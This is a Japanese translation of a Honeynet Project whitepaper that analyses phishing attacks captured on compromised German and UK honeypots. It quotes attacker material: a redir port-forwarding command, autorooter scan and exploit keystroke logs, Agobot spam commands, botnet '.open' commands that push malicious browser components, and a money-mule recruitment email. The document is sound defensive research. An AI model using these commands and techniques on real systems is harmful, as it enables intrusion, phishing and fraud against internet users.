Know your Enemy: |
データ | ドイツの事件 | 英国の事件 |
脆弱にしたハニーポット | Redhat Linux 7.1 x86. | Redhat Linux 7.3 x86. |
場所 | German corporate network | 英国ISPデータセンター |
攻撃方法 | "Superwu" autorooter. | "Mole" mass scanner. |
侵入方法 | Wu-Ftpd File globbing heap corruption vulnerability (CVE-2001-0550). | NETBIOS SMB trans2open バッファオーバーフロー (CAN-2003-0201). |
入手されたアクセスのレベル | Root. | Root. |
インストールされたルートキット | いくつかのバックドアの実行ファイルで構成されたシンプルなルートキット. | |
推定される攻撃者 | 不明. | ルーマニア国コンスタンツァ県のケーブルモデムのIPの範囲の複数グループ. |
ウェブサイトによる活動 | eBayと有名な米国の銀行をターゲットとした既存のフィッシングウェブサイトをダウンロードして利用. | 有名な米国の銀行をターゲットとした既存のフィッシングウェブサイトをダウンロードして利用. |
サーバサイドの処理 | ユーザの入力で認証するPHP スクリプト. | より高度にユーザの入力で認証しデータを分類するPHP スクリプト. |
Eメールによる活動 | 試験的にEメールを送信した.これはフィッシャーに送られた可能性がある.文法と文面を改良した. | |
多量のメールの送信法 | 中規模なEメールアドレスのリストを入力された基本的なPHPスクリプト | 小規模なEメールアドレスのリストを入力された基本的なPHPスクリプト - 試験しただけかもしれない |
被害者のトラフィックがハニーポットに到達したか | No.スパムによる広告とフィッシングウェブサイトへのアクセスがブロックされた. | Yes. 265 の HTTP リクエストが 4 日間あったが,このサーバから送信されたスパムが原因ではない. (誰もこのサーバの脆弱さについて知らない) |
どちらの事件もフィッシャーのキーストロークを観察すると (Sebek によって入手した),攻撃者は既に存在するバックドアに接続し,ただちにフィッシングウェブサイトを配置したことが明らかになった. 攻撃者はサーバの環境をよく知っている者とみられ,ハニーポットに侵入したグループの一部だと言うことができ,そのフィッシング攻撃を非常に上手に準備した. アップロードされたコンテンツはたびたび他のサーバやIPアドレスから参照され,おそらくは複数のサーバで同時にこのような活動をしたのだろう.
フィッシングウェブサイトのコンテンツは攻撃者にダウンロードされて解析された.そして多くの有名なオンラインブランドを一斉にターゲットにしたことは明らかである. 既存の偽のウェブサイトをルーチン的に脆弱なサーバに配置した - スパムメールを送信するツールが必要であるとともに,複数の異なるウェブをルートに配置した 個々の"micro sites" によって複数の団体をターゲットにした. FTP セッションのディレクトリリストの作成を 観察することによっても攻撃者はフィッシングに非常に関わりがあると確認できた.英国の事件では既存のウェブコンテンツを表し,メッセージ配信ツールを中央のサーバに入れ,eBay や AOL,いくつかの有名な米国の銀行をターゲットにした. この事件では,スパムメールはたびたび被害者をハニーポットから違うウェブサーバに導いた.このことから個々のフィッシング攻撃は一つ一つのイベントが独立しているとは考えにくい. 英国のハニーポットがセキュリティ侵害された後,フィッシングコンテンツへの最初のインバウンドの HTTP リクエストもフィッシングが平行して行われていることを示している.
2004-07-23 21:23:14.118902 XXX.XXX.XXX.XXX -> 10.2.2.120 HTTP GET /.internetBankingLogon HTTP/1.1
このインバウンドの HTTP リクエストは攻撃者が偽の銀行のコンテンツをハニーポットにセットアップする前のものであり,攻撃者は事前にフィッシングウェブサイトとして使えることを知っていたと確証した. おそらく攻撃者がフィッシングウェブサイトをセットアップしている間に,スパムメッセージは他のホストから既に広告されていた.
ハニーポットの偽のオンラインの銀行のコンテンツに送られた,インバウンドの HTTP リクエストの発信元IPアドレスの範囲に私たちは驚かされた. 下に示すグラフは,ハニーポットがエンドユーザを保護するためオフラインになるまでに,個々の IP アドレスから英国のフィッシングウェブサイトへ送られた HTTP リクエストの単独での数と繰り返された数である (事件の詳細はターゲットにされた銀行でも記録された.)
英国のハニーポットのフィッシングコンテンツにアクセスした発信元を,トップレベル DNS ドメインによって国とホストオペレーティングシステムで分類した内訳はここに載せた. 注目すべきは,ハニーポットが解析のためオフラインになる前に,フィッシングウェブサイトへのウェブトラフィックは英国のハニーポットに届いていたことである.しかしこのフィッシング攻撃では HTTP POSTリクエストは PHP スクリプトから作られなかったので,ユーザのデータは奪われていない. 全ての事件をこのホワイトペーパーでは議論し,ターゲットの団体のどちらにもこの事件を報告した.多くのデータが要求に応じて利用できるように,いくつかの悪意ある活動をその国のCERT に報告した. 全ての場合においてハニーネットプロジェクトやリサーチアライアンスのメンバーが捕捉した被害者の個人データは悪用していない.
二つの例に挙げた事件のデータより,脆弱なコンピュータシステムの間を素早く移動し,一斉に複数の有名なブランドをターゲットにすることから,フィッシャーは活動的で組織的だと言える. 多くのEメールユーザが騙されてオンラインの銀行や販売店のような組織の偽のウェブサイトにアクセスし,フィッシング攻撃の被害者となっていくのである.
フィッシングテクニック その2 - ポートリダイレクトによるフィッシング
2004年 11月,German Honeynet Project はクラシックな第2世代ハニーネットと RedHat Linux 7.3 のハニーポットを配置した. しかしこの比較的古い OS は攻撃者にとって簡単にターゲットにでき,ハニーポットにセキュリティ侵害してから 2.5 ヶ月間使用された - 前述の事件でハニーポットが直ちにセキュリティ侵害されたのと対照的である. この傾向の更なる情報は KYE ホワイトペーパー "Know your Enemy: Trends"で見ることができる.
2005年1月11日,OpenSSL SSLv2の不正なクライアントキーによるバッファオーバーフローの脆弱性を利用して攻撃者はデフォルトのRedhat Linux 7.3のハニーポットのセキュリティ侵害に成功した. この事件では通常と異なり,攻撃者は一度この脆弱なシステムを手に入れてもすぐにフィッシングコンテンツをアップロードしなかった. そのかわり,攻撃者はハニーポット上でポートリダイレクトのサービスをインストールし,設定を行った.
このポートリダイレクトのサービスは HTTP リクエストのルートを変更するように設計されていた.これはハニーポットのウェブサーバからリモートウェブサーバへ通す方法である. 攻撃者はredirと呼ばれるツールをハニーポットにインストールした.これはポートリダイレクトのユーティリティであり,外から入ってくるTCPコネクションをリモートホストにフォワードするものである.この事件ではハニーポットのTCPの80番ポート (HTTP) から中国のリモートウェブサーバのTCPの80番ポート (HTTP) にリダイレクトしていた. 面白いことに攻撃者はハニーポットにルートキットをインストールして自分の存在を隠すことをしなかった.これはこの脆弱なサーバを過小評価し,正体を見破られることを特に心配しなかったためだと考えられる.
攻撃者はポートリダイレクトを確立させるために以下のコマンドを用いた:
redir --lport=80 --laddr=<IP address of honeypot> --cport=80 --caddr=221.4.XXX.XXX
それに加えて,攻撃者は Linux システムのスタートアップファイル /etc/rc.d/rc.local を書き換え,ハニーポットシステムが再起動してもポートリダイレクトサービスが再起動するようにし,生存するチャンスが増すように改良した. その後スパムフィッシングメールを送信し,ハニーポットを宣伝した. 見つけられた文面はこのようなものであった. (注:機密事項はぼかした)
さらにフィッシャーの活動を調べるために,German Honeynet Projectのメンバーは,攻撃者がハニーポットにインストールした設定を密かに書き換えた.これによってハニーポットから広告されたスパムメールによって,ハイパーリンクをクリックしてフィッシングコンテンツにリダイレクトされた人数を容易に測定できるようになった. 36時間の間に721もの個別のIPアドレスがリダイレクトされていた.私たちはフィッシングメールによって騙される人の多さに驚かされた. ポートリダイレクトされたIPアドレスの解析結果はここに示した. (この情報はフィッシングコンテンツにアクセスしたユーザを保護し,IPアドレスは研究中以外に記録していない. 個人情報は捕捉していない.)
事件のタイムラインを以下に示した:
日時 | イベント |
2004年 11月 1日 | 初めてハニーポットのデータを探される. |
2005年 1月 11日 - 19:13 | ハニーポットが OpenSSL のサービス侵害を行われ, ポートリダイレクターがインストールされ, フィッシングのスパムメールが送信された. |
2005年 1月 11日 - 20:07 | ハニーポットにフィッシングコンテンツへの Web リクエスト が届き始める. |
2005年 1月 13日 - 8:15 | ハニーポットは解析のためオフラインになった. |
フィッシングテクニック その3 - ボットネットを利用したフィッシング
最近ハニーネットプロジェクトは "KYE: Tracking Botnets" でボットネットの追跡の方法について紹介した. ボットネットとは攻撃者にリモートコントロールされたコンピュータのネットワークである. 莫大なため(1万ものシステムがリンクされている),ボットネットにサービス拒否 (DoS) 攻撃をされると非常に危険である. この分野の最初の研究で,ボットネットがスパムメールを送信することに使われたこととフィッシング攻撃にも使えることが明らかにされた.2004年10月の調査で,Eメールセキュリティの CipherTrust社 は監視したフィッシングスパムメールのうちの 70% が 5 ヶ所あるアクティブなボットネットの一つから送信されていると発表したが,私たちの観察からはより多くのボットネットがスパムメールを送信していると言える. ある一つの事件の解析ではないが,このセクションでは攻撃者のボットネットを利用したフィッシングのツールとテクニックを観察したことを示す.
事件のタイムライン
2004年9月から2005年1月までの間に,ドイツハニーポットプロジェクトはパッチを当てていない Microsoft Windows をベースとしたハニーポットをボットネットの活動の観察のために設置した. ハニーポットをいくつも配置できるように自動化し,セキュリティ侵害させ,解析のためシャットダウンした. オフラインの解析によって 100 以上の個々のボットネットが観察され,1000 ものファイルを捕捉した.
解析
この脆弱なホスト上で SOCKS v4/v5 がリモートで開始されてから,本研究ではボットのソフトウェアのいくつかのバージョンを捕捉した. SOCKS は一般的なプロクシで,TCP/IP ベースのネットワークアプリケーションであり(RFC 1928),HTTP や SMTP のようにインターネットトラフィックでは有名でよく使われているプロクシである. 攻撃者が SOCKS プロクシの機能でリモートのボットにアクセスすると,このマシンはサイズの大きなスパムメールを送信できる. もしボットネットが 1000 を超える脆弱なホストで構成されているなら,攻撃者は容易にサイズの大きなメールを一度に多量に送信できる.これはたびたびホームPCユーザたちが所有する広範囲なIPアドレスから送られている.
低リスクにすると,主要目的である接触はできず,国境をまたがるのでトレースや活動を止めることが難しい.しかし高リスクにするとスパマーやフィッシャーに利用されることになる. おそらく,ボットネットのリソースを多く持つ所有者は犯罪目的で活動しており,現在ではボットネットを貸し出している可能性がある. 手数料を徴収して,ボットネットのオペレーターは SOCKS v4 が動いているサーバの IP アドレスとポートのリストを与える. これはスパムのリレーがスパマーに売られた時の証拠である:"Uncovered: Trojans as Spam Robots". ボットのソフトもEメールアドレスを収集し,ボット経由でスパムを送信する機能を実行していることを何件か捕捉した. 次のリストは Agobot が実行したスパム/フィッシングEメールの送信に関するコマンドである.Agobot は攻撃者にとって一般的に使われているボットで,私たちの研究できちんと捕捉した様々なコマンドを挙げた.
- harvest.emails - "ボットにEメールのリストを取得させる"
- harvest.emailshttp - "HTTPを通してボットにEメールのリストを取得させる"
- spam.setlist - "Eメールのリストをダウンロードさせる"
- spam.settemplate - "Eメールのテンプレートをダウンロードさせる"
- spam.start - "スパムを開始する"
- spam.stop - "スパムを停止する"
- aolspam.setlist - "AOL - Eメールのリストをダウンロードさせる"
- aolspam.settemplate - "AOL - Eメールのテンプレートをダウンロードさせる"
- aolspam.setuser - "AOL - ユーザネームをセットする"
- aolspam.setpass - "AOL - パスワードをセットする"
- aolspam.start - "AOL - スパムを開始する"
- aolspam.stop - "AOL - スパムを停止する"
これらのコマンドについてのさらなる情報は,ボットのソースコードの注釈をつけてここに示した. German Honeynet Project が IRC クライアントをカスタマイズした drone のヘルプから,スパム/フィッシングメールによる攻撃がどのように行われているのかより深く学ぶことができる.この攻撃は,私たちのハニーポットを攻撃している間に収集した接続のデータを,偽のクライアントからボットネットへ密かに通信することである. 観察した活動のいくつかの特徴的な例を以下に挙げた.
例 1
私たちが観察していたあるボットネットで攻撃者は次のコマンドを発行した(注:URL はぼかした):
<St0n3y> .mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this
コマンド .mm ("大量メール配信") は spam.start コマンドをカスタマイズしたものである. このコマンドは4つのパラメータを受け付ける:
- いくつかのEメールアドレスも記した URL のファイル
- スパムメールのターゲットとなるウェブページ - 通常のスパムウェブページかフィッシングウェブページが可能
- 送信者の名前
- Eメールの件名
この場合には,fetch.php スクリプトを呼び出すとといつでも 30 の異なるEメールアドレスを返した. それぞれの受取人にはコマンドの2番目のパラメータで広告するようにEメールのメッセージが構成された. この例では,被害者のコンピュータに ActiveX コンポーネントをインストールするように要求するウェブページが指定されていた.
例 2
他のボットネットでは,ブラウザヘルパーオブジェクトが被害者の PC にインストールされることを観察した:
[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s
.open コマンドは各ボットネットの被害者にウェブページを見せるように指示するものである. この場合にはウェブページはブラウザヘルパーオブジェクト (BHO)を含み,被害者のPCにインストールさせるようになっていた. チャンネルの名前が示す通り,このボットネットもスパムメールを送信するために使われた.
例 3
他のボットネットでは,スパイウェアの普及の例を観察した:
http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...]
このリンクはマルウェアを捕捉していたときに見つけた. これは"無料広告デリバリーソフトウェアは宣伝を提供しています"という宣伝で直接被害者を企業のウェブページへ誘導する. このウェブページにはいくつかのページがあり,ActiveXコンポーネントを訪れたクライアントにインストールしようとする.おそらくアドウェアかスパイウェアだろう.
共通テーマ
私たちの研究を通して,フィッシング攻撃のいくつかの共通テーマは攻撃者がいくつものツールとテクニックを用いて成功するようにしていることは明らかである. これより手短に二つのテクニックについて再検討する - 多量のスキャニングとコンビネーション攻撃
多量のスキャニング
ハニーポットの解析によって,自動的に攻撃するスクリプトや autorooter などのよく知られたツールを使用してシステムを攻撃することを示した. どちらの事件もフィッシングのテクニックは既に記述した.攻撃者は一度セキュリティ侵害してから autorooter というツールキットをサーバにアップロードした. 攻撃者は類似した脆弱なサーバを探すため,広域の IP アドレスをスキャンした (使用したスキャナはドイツの事件では "superwu" と呼ばれていたもので,英国の事件では "mole" と呼ばれているものが使われた.) 英国の事件で補足した攻撃者のキーストロークは以下に示した.これは脆弱なハニーポットから大量にスキャニングするタイプの例である. ハニーネットの設定により,外へ行く敵意のあるトラフィックを遮断したため,攻撃は失敗している.
攻撃者がスキャナを展開し,クラス B のネットワークのブロックをスキャンした:
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz [2004-07-18 15:23:33 bash 0]cd mole [2004-07-18 15:23:38 bash 0]./mazz 63.2 [2004-07-18 15:24:04 bash 0]./mazz 207.55 [2004-07-18 15:25:13 bash 0]./scan 80.82
攻撃者が脆弱である可能性があるサーバへ侵入を企てた:
[2004-07-19 11:56:46 bash 0]cd mole [2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net [2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNN
攻撃者にセキュリティ侵害に成功したサーバのリストが返る (ハニーネットの設定のため,このリストは空である.):
[2004-07-23 08:13:18 bash 0]cd mole [2004-07-23 08:13:20 bash 0]ls [2004-07-23 08:13:25 bash 0]cat hacked.servers
攻撃者は複数のクラス B ネットワークのブロックをスキャンした後,ターゲットの選択をテストした:
[2004-07-24 10:24:17 bash 0]cd mole [2004-07-24 10:24:19 bash 0]./scan 140.130 [2004-07-24 10:24:27 bash 0]./scan 166.80 [2004-07-24 10:25:36 bash 0]./scan 166.4 [2004-07-24 10:26:23 bash 0]./scan 139.93 [2004-07-24 10:27:18 bash 0]./scan 133.200 [2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX [2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY [2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY
この例では最後に,攻撃者によってセキュリティ侵害されたホストは,部分的な IP アドレスの範囲でハニーポットからスキャンされたものではない.協調し平行して行われた多量のスキャンの活動の証拠がこのハニーポットに残された.
英国の攻撃者によってダウンロードされた mole.tgz ファイルをさらに調べた.いくつかのテキストファイルが root ディレクトリに展開され,autorooter ツールキットとなった. これらのファイルにはスキャンの設定と,以前に "grabbb2.x と samba2.2.8 の脆弱性" をスキャンしたログがあった. クラス B ネットワークのブロックをスキャンした証拠であるこれらのファイルと共に,他のホストへ42種類の攻撃についてのファイルがあった.この事件で大きく,より組織的に類似したシステムを攻撃していることを観察した. 攻撃者の視点からスキャニングツール The mole をここに例としてあげた.
最後に,大きなスキャニングツールはハニーポットから大衆の回線に現れることはなかった.攻撃者はある程度の開発のレベルを持ち,スクリプトキディの活動を超えたツール制作者か,パブリックなフォーラムでツールを共有しない閉じたコミュニティの者であるといえる. 繰り返すが,攻撃者たちは組織的である.
コンビネーション攻撃
私たちの研究によって,このホワイトペーパーで紹介した三種類の攻撃のテクニックをたびたびフィッシャーが組み合わせたことを観察した.ときには複数の方法で冗長性を与え,二段階のネットワーク設定によってフィッシングの構造を保護した. 下図は起こりうるフィッシングのネットワークトポロジーである:
この例では,中央のウェブサーバが物理的なフィッシングコンテンツを持ち,たびたび複数のウェブサイトを持っている (例えば eBay のフィッシングサイトは /ebay に, PayPal のフィッシングサイトは /paypal にある). いくつかの脆弱なリモートコンピュータはポートリダイレクターの redir の助けで,中央のウェブサーバのTCPポート 80 に外から来る HTTP トラフィックをリダイレクトする. この方法は攻撃者から見て単一のフィッシングウェブサイトよりもいくつかの利点がある:
- リモートの redir を使ったホストが発見された場合,被害者はおそらくシステムをオフラインにし,再インストールするだろう. しかしこの方法ではフィッシャーは大きな損害を受けない.なぜならメインのフィッシングウェブサイトはまだオンラインであり,他の redir を使ったホストがHTTPトラフィックを中央のウェブサイトに送り続けているからである.
- 中央のフィッシングサーバが発見された場合も,おそらくシステムはオフラインにされるだろう. その場合には,フィッシャーは簡単に新しいフィッシングサイトを侵入したシステムに作る.そしてほかの redir ホストのトラフィックを新しい中央のフィッシングサイトにリダイレクトするように置き換えるだけで調整できる. このテクニックにより全体のネットワークを利用可能にし,直ちにフィッシング攻撃を再開できるのである.
- redir ホストはとても融通が利くので,簡単にほかのフィッシングウェブサイト用に設定を変更することが容易である. これはセキュリティ侵害してからフィッシングウェブサイトを利用可能にするまでの時間を短縮し,フィッシング攻撃をしている時間を増やすことになる.
そのようなテクニックを使うことからも単純なスクリプトキディの仕業に比べ,より組織的で有能な攻撃者の仕業であると言える. 類似した操作をするモデルとしては,大きなウェブホスティングの企業と多量のコンテンツを持つプロバイダがあげられる.
更なる観察 - 資金の移動
私たちの研究もフィッシャーがどのようにして入手した銀行のアカウントの情報を利用するのかを説明する.例えば,銀行のアカウントの情報とはアカウントナンバーの仲間である TAN (インターネットの銀行で使われているトランザクションナンバー) である. 外貨の移動は大抵の銀行に監視されているため,フィッシャーが金融当局に警戒されずに巨額の資金を他国へ移動することは簡単にできるものではない. そのためフィッシャーは資金を中継させなければならない.フィッシャーは被害者の銀行のアカウントから同じ国の中継のためのアカウントへ資金を移す. 中継したアカウントから資金を引き出す (このサービスにより,手数料が差し引かれる).そして例えば普通郵便でフィッシャーに送られる. もちろん,中継人を捕まえてもフィッシャーの金は常に通過しているため彼らはたいしたリスクを負うことはない.しかも簡単に中継を置き換えてルートを変えることができる. フィッシング攻撃後の資金移動の構造を示す例となるEメールを以下に示す:
こんにちは. 私たちは,ヨーロッパのクライアントから販売して得た資金を 銀行で受け渡してくださる方を探しています. ロシアでは国際的な譲渡で税を払う必要はありません. 送金していただくと,あなたが受け取った額の10%は提供し, すべての手数料は支払います. ただし,1日総額1000ユーロまでとなります. これはヨーロッパで合法な活動です. http://XXX.info/index.php のフォームに急いですべての項目に入力してください. (入力する前にyahooメッセンジャーかMSNメッセンジャーをインストールしてください.) _________________________________________________________ Wir, europäische Personen findend, die Bankleitungen davon Senden/erhalten können unsere Verkäufe, von unseren Kunden von Deutschland. STEUERN von internationalen Übertragungen in Russland nicht zu bezahlen. Wir erhält das Prozent des Angebots 10 % vom Betrag und bezahlt alle Schulgelder, um Kapital zurück zu senden. Betrag von 1000 Euro pro Tag. Diese ganze Tätigkeit ist in Europa gesetzlich. Füllen Sie diese Form: http://XXX.info/index.php (bevor die Füllung Yahoo installiert! Bote bitte oder msn), Sie recieve volle Details sehr. Thank you, FINANCIE LTD.
これは英語からドイツ語へのひどい訳でおそらくコンピュータに作らせたものであり,攻撃者は英語のネイティブスピーカーではないといえる. 資金はロシアに送られ,攻撃者はおそらくこの国で引き出したのだろう. この行動によってフィッシング攻撃が共通的により組織的になっている.
Honeysnap - 事件の解析のアシスタント
既にあげたフィッシングテクニックによって英国のハニーネットがセキュリティ侵害されたときのデータは,解析することでただちに結論を出せる. - 別々のグループから同時に攻撃されたために,詳細に解析できるようになるまでにネットワークストリームからのデータの展開と準備のための時間が必要だった. データの展開作業は繰り返しで退屈である.もし手動で行うと大切な解析の時間を使っていまい,能率が悪い. 自動化するソリューションが求められた.
honeysnap スクリプトは英国はニーネットプロジェクトの David Watson によって書かれた.これはこのアイディアをもとに作られたもので, 1 日を基準としてハニーネットのデータを処理し,簡単な要約を手動の解析の後に出力するようにデザインされている. honeysnap スクリプトはそれぞれのハニーポットのデータを分析し,外に出る HTTP,FTP GET,IRC メッセージ,Sebek キーストロークログのリストを与える. TCP ストリームは接続ごとに再び集められ,種類ごとに自動的に分類され,これを展開するには FTP や HTTP で認証してからファイルをダウンロードすればよい.事件の解析のための準備に時間をかけなくて済み,解析者は事件の鍵を調査することに集中できる. honeysnapも自動的に IRC トラフィックから興味のあるキーワード (例えば bank, account, password) を自動的に抜き出し,日々の要約をEメールでリポートする.
現在のところ honeysnap は基本的に UNIX シェルスクリプトであり,アルファリリースをここで見つけられるだろう.そしてhoneysnapの出力結果のサンプルはここにある. 現在,ハニーネットプロジェクトのメンバーによって Python で記述したモジュール式で拡張性の高いバージョンを開発中であり,2005年6月にコミュニティにβリリースする予定である.
更なる研究
この情報はフィッシングの分野でいくつかの可能性のある将来の研究の手段を示した.私たちは以下の議題についてさらに調べることを勧める:
私たちはハニーポットをスパマーやフィッシャーと戦うことを助けるために使われるように研究したい. 可能性のある研究のプロジェクトとしては,フィッシング攻撃を観察したら正常なタイプのハニーポットを追加して配置するか,スパマーにとって魅力的なターゲット (例えば SMTP オープンリレーを用意する) を用意することである. 特にボットネットを利用したフィッシングの分野では,フィッシング攻撃の構造を更に理解するために,システムへの攻撃を更に解析し,フィッシングテクニックの進展を追跡することが重要である. ほかに可能な研究としては,ハニーポットのアイディアをより発展させ,"client-side honeypot" を作ることである. 次世代のハニーポットは能動的に通信ネットワークに参加するようになるだろう.例えば自動的にスパムメールのリンクをたどりターゲットコンテンツにアクセスするのである. 通信ネットワークの危険に関する私たちの知識を更に改良するには,client-side honeypot は IRC チャンネルか,ファイルを共有/ダウンロードのためのピアツーピアネットワークをアイドリングさせることである.
さらに,私たちはフィッシング攻撃を数え,停止させる方法を探したい. なので,これは非常に難しい仕事であるが,ソースホストから広範囲に拡散するとき,数時間や数日の間にフィッシング攻撃をするであろう限定した時間帯を知りたい. 本研究ではこの分野 (例えば The AntiPhishing Group や PhishReport) エンドユーザ受け取ったフィッシングEメールを集めることに注力した. 実現可能なアプローチは,事件のライフサイクルの最終段階まで捕らえることである. 自動化はフィッシング攻撃を捕らえ,反応することに適している.
私たちはブラックハットの間でおそらく IRC を通してアカウントとパスワードが交換されているのではないかと疑っている. ハニーネットテクノロジは通信を捕捉し,更にフィッシング攻撃を理解するために使うことができた. さらに,中央のウェブサーバや FTP サーバにいくつかアップロードされたファイルがダウンロードされていることを見ることができた. しかしさらに議論するためにはそのような活動を監視し,フィッシングを防ぐことに協力するシステム管理者と接触し,そのような研究をするためのフレームワークと可能性のある対応策を確立することが必要である.
更なる仕事は解析の自動化を要求される.特にこのような攻撃をされている間に捕捉したデータを自動的にプロファイリングすることにである. トラフィックと IP アドレスの抽出,DNS の逆引きと IP ブロックの所有者の調査,IP アドレスごとやドメインごとのトラフィックの概算,受動的なオペレーティングシステムのフィンガープリンティング,これらは大きなデータセットを解析する上で有用である.このデータセットとは,Known hosts,攻撃者,侵入検知パターン,メッセージコンテンツなどである. 長期的には,同一の基準にしてそのような情報を共有することと,悪意のある者の活動の拡散の解析をサポートするグローバルなデータベースは非常に望まれており,コミュニティに重大な利益をもたらすだろう.
結論
この文書では私たちはいくつかの実世界のフィッシング攻撃の例と,そのような事件における攻撃者の行動の全てのライフサイクルを紹介した. すべての情報は高対話型ハニーポットで捕捉し,ハニーネットテクノロジの強力なツールで情報の保証と解析を行った. 私たちは German Honeynet Project と UK Honeynet Project が配置したハニーポットが受けた複数の攻撃を解析した. それぞれの事件でフィッシャーはハニーポットシステムを攻撃し,セキュリティ侵害した.しかし侵入してからの行動は異なり,いくつものフィッシング攻撃のテクニックを観察できた:
- 有名なオンラインの銀行をターゲットとしたフィッシングウェブサイトをセットアップする.
- フィッシングウェブサイトを宣伝するスパムメールを送信する.
- 既にあるフィッシングウェブサイトへウェブのトラフィックをリダイレクトするサービスをインストールする.
- スパムメールとフィッシングメッセージをボットネットを通して広める.
フィッシャーの特徴的な行動と被害者を魅了し騙す方法が,このデータによって理解しやすくなった. 私たちはフィッシング攻撃が非常に速やかに行われることを学んだ.この限られた時間に,システムに侵入し,フィッシングウェブサイトをオンラインにし,このウェブサイトを広告するスパムメッセージを送信する.このスピードが追跡と予防を難しくするのである. 特にフィッシング攻撃の被害者の IP アドレスのブロックは家庭や小企業の DSL のアドレスである.おそらくシステムはあまり管理されず,現在のセキュリティパッチにアップデートしていないのだろう.そして攻撃者も有名な企業のシステムをターゲットにはしないだろう. 一斉に小さな組織を数多く攻撃されると反応は難しくなる. 私たちはおそらくスパムメッセージを読んだエンドユーザがフィッシングコンテンツにアクセスすることを観察し,多くの人がその攻撃の被害者になる危険があったことに驚かされた.
私たちの研究もフィッシング攻撃がより広範囲で組織的になっていることを示した. オンラインのブランドをターゲットにした既設のフィッシングウェブサイトを得ることで,直ちに設置の準備した.これは組織的なフィッシンググループによる仕業だと言える. ポートリダイレクトやボットネットでネットワーク接続を確立し,非常に速く広めることができる. 大量のスキャニングとウェブやスクリプトにあるハードコードされた IP アドレスに関連づけたとき,多くの場合,特定のフィッシングサイトは常に活動しているだろう. ウェブトラフィックが別の脆弱なサーバに到達する.その前に,フィッシングコンテンツのアップロードは完了し,フィッシングのスパムメールはある侵入されたホストから配信される.このホストは常に送信しているわけではない.このことから,組織的なグループによって分散され並列なフィッシングが行われていると言える.
中継人を使った資金の移動の隠し方だけでなく,スパムメールとボットネットネットとフィッシング攻撃の繋がりを示した. 多量の脆弱性のスキャニングと定量的なデータと二段階のフィッシングネットワークを組み合わせて観察した.このことからフィッシャーの脅威は現実的になり,行動は組織的になり,方法は非常に高度であることを示した. 多く賭けるほど多く戻ってくるように,フィッシングテクニックは高度になり,近年フィッシング攻撃が増加し続けている. ボットネットに寄与する脆弱な PC を減らし,増え続ける多量のスパムメールに逆い,組織的な犯行を防ぎ,ソーシャルエンジニアリングに残るすべての重要なセキュリティの課題のリスクをインターネットユーザに教育しよう.
この文書のサブセクションの詳細は以下のリンクから見つけられるだろう:
質問とコメントは直接German Honeynet ProjectとUK Honeynet Project にしてほしい.